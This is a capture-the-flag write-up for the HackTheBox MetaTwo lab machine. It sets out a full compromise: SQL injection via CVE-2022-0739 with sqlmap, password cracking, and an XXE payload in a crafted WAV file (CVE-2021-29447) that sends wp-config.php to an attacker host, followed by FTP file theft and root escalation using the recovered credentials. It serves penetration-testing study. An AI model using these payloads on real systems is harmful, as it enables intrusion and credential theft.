# HackTheBox: MetaTwo
## Notes by [Invictus808](https://invictus808.com)

## Scan

- [nmap](enumeration/external/nmap.txt)
    - ```console
        $ nmap -T4 -p- -A $IP
        ```
- [nikto](enumeration/external/nikto.txt)
    - ```console
        $ nikto -h $URL
        ```
- gobuster
    - [dir](enumeration/external/gobuster-dir.txt)
        - ```console
            $ gobuster dir -u $URL -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt -x php,html -o gobuster-dir.txt
            ```
    - [vhost](enumeration/external/gobuster-vhost.txt)
        - ```console
            $ gobuster vhost -u $URL -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o gobuster-vhost.txt
            ```


## WordPress

### Scheduler

- ![Events page](screenshots/events.png "Events Page")
    - [event schedule request](requests/events.req)


## [CVE-2022-0739 - BookingPress < 1.0.11 - Unauthenticated SQL Injection](https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357)

- [proof of concept](sqli/sqli_poc.sh)


### SQL Injection - sqlmap

- [exploit request](requests/exploit.req)
    - ```console
        $ sqlmap -r exploit.req -p total_service
        $ sqlmap -r exploit.req -p total_service --dbs
        $ sqlmap -r exploit.req -p total_service -D blog --tables
        $ sqlmap -r exploit.req -p total_service -D blog -T wp_users --dump
        ```
        - [wp_users table dump](sqlmap/wp_users.csv)


## Crack Hashes - Hashcat

- crack [database hashes](hashcat/wp_users.hash)
    - ```console
        $ hashcat -a 0 -m 400 wp_users.hash /usr/share/wordlists/rockyou.txt -o crackedhashes.txt -O --force --potfile-disable
        ```
    - module 400 - `phpass` | `Generic KDF`
- [recovered hashes](hashcat/crackedhashes.txt)
    - ```
        admin:
        manager:partylikearockstar
        ```


## WordPress

### Admin Login (`/wp-admin`)

- ![Admin login page](screenshots/wp-admin_login.png "Admin Login Page")


### Media Library

- ![Media library page](screenshots/wp-admin_media-library.png "Media Library Page")


## [CVE-2021-29447 - WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8](https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)

- create [`xxe.dtd`](xxe/xxe.dtd)
    - retrieve [`wp-config.php`](enumeration/internal/wp-config.php)
    - ``` console
        $ export FILE=<FILE>
        $ export ATTACK_IP=<ATTACK_IP>
        $ export PORT=<PORT>
        $ echo "<!ENTITY % file SYSTEM \"php://filter/zlib.deflate/read=convert.base64-encode/resource=$FILE\">" > xxe.dtd
        $ echo "<!ENTITY % init \"<!ENTITY &#x25; trick SYSTEM 'http://$ATTACK_IP:$PORT/?p=%file;'>\" >" >> xxe.dtd
        ```
- host [`xxe.dtd`](xxe/xxe.dtd) on machine
    - ```console
        $ php -S 0.0.0.0:$PORT
        ```
- create [`poc.wav`](xxe/poc.wav)
    - ```console
        $ export ATTACK_IP=<ATTACK_IP>
        $ export PORT=<PORT>
        $ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://$ATTACK_IP:$PORT/xxe.dtd'"'"'>%remote;%init;%trick;]>\x00' > poc.wav
        ```
- upload [`poc.wav`](xxe/poc.wav) to WordPress Media Library
- decode base64 in server log using [`decode.php`](xxe/decode.php)
    - ```console
        $ php decode.php
        ```
- credentials !!!
    - [`wp-config.php`](enumeration/internal/wp-config.php)
        - ```sh
            # database
            DB_NAME:blog
            DB_USER:blog
            DB_PASSWORD:635Aq@TdqrCwXFUZ
            DB_HOST:localhost
            DB_CHARSET:utf8mb4
            DB_COLLATE:

            # ftp
            FS_METHOD:ftpext
            FTP_USER:metapress.htb
            FTP_PASS:9NYS_ii@FyL_p5M2NvJ
            FTP_HOST:ftp.metapress.htb
            FTP_BASE:blog/
            FTP_SSL:false
            ```
    - [`/etc/passwd`](enumeration/internal/etc-passwd.txt)
        - ```sh
            jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
            ```
            - only user with login shell


## FTP
- file exfiltration
    - ```console
        wget -r --user="metapress.htb" --password="9NYS_ii@FyL_p5M2NvJ" ftp://metapress.htb/
        ```
- credential !!!
    - [`send_mail.php`](enumeration/internal/send_email.php)
        - ```sh
            Host:mail.metapress.htb
            SMTPAuth:true
            Username:jnelson@metapress.htb
            Password:Cb4_JmWM8zUZWMu@Ys
            SMTPSecure:tls
            Port:587
            ```


## User Account Shell !!!
- SSH as `jnelson` user
    - ```console
        $ ssh jnelson@metapress.htb
        jnelson@metapress.htb's password: Cb4_JmWM8zUZWMu@Ys
        ```
        - ![jnelson user shell](screenshots/jnelson.png)
- retrieve [`user.txt`](flags/user.txt) flag
    - ```console
        jnelson@meta2:~$ cat /home/jnelson/user.txt
        ```


## Passpie
- show passpie table
    - ```console
        jnelson@meta2:~$ passpie
        ╒════════╤═════════╤════════════╤═══════════╕
        │ Name   │ Login   │ Password   │ Comment   │
        ╞════════╪═════════╪════════════╪═══════════╡
        │ ssh    │ jnelson │ ********   │           │
        ├────────┼─────────┼────────────┼───────────┤
        │ ssh    │ root    │ ********   │           │
        ╘════════╧═════════╧════════════╧═══════════╛
        ```
- export credentials
    - ```console
        jnelson@meta2:~$ passpie export $FILE
        Passphrase:
        ```
        - need to find passphrase


## PGP Keys

- public and private key
    - [`/home/jnelson/.passpie/.keys`](enumeration/internal/.keys)
        - [`public.key`](enumeration/internal/public.key)
        - [`private.key`](enumeration/internal/private.key)


## John The Ripper (GPG)

- convert [`private.key`](enumeration/internal/private.key) to hash
    - ```console
        $ gpg2john private.key > private.hash
        ```
- crack passphrase of [`private.hash`](enumeration/internal/private.hash)
    - ```console
        $ john --wordlist=/usr/share/wordlists/rockyou.txt private.hash
        ```
        - Passphrase: `blink182`


## Privilege Escalation

### Passpie

- export credentials
    - ```console
        jnelson@meta2:~$ passpie export $FILE
        Passphrase: blink182
        ```
- [`credentials`](enumeration/internal/credentials.txt)
    - ```yaml
        credentials:
        - comment: ''
        fullname: root@ssh
        login: root
        modified: 2022-06-26 08:58:15.621572
        name: ssh
        password: !!python/unicode 'p7qfAZt4_A1xo_0x'
        - comment: ''
        fullname: jnelson@ssh
        login: jnelson
        modified: 2022-06-26 08:58:15.514422
        name: ssh
        password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
        handler: passpie
        version: 1.0
        ```


### Root
- switch to root user
    - ```console
        jnelson@meta2:~$ su root
        Password: p7qfAZt4_A1xo_0x
        ```
- PWNED !!!
    - ![Root shell](screenshots/root.png "Root Shell")
- retrieve [`root.txt`](flags/root.txt) flag
    - ```console
        root@meta2:~# cat /root/root.txt
        ```


## Acknowledgment of Completion

- [HackTheBox - MetaTwo Completion](https://www.hackthebox.com/achievement/machine/1303009/504)
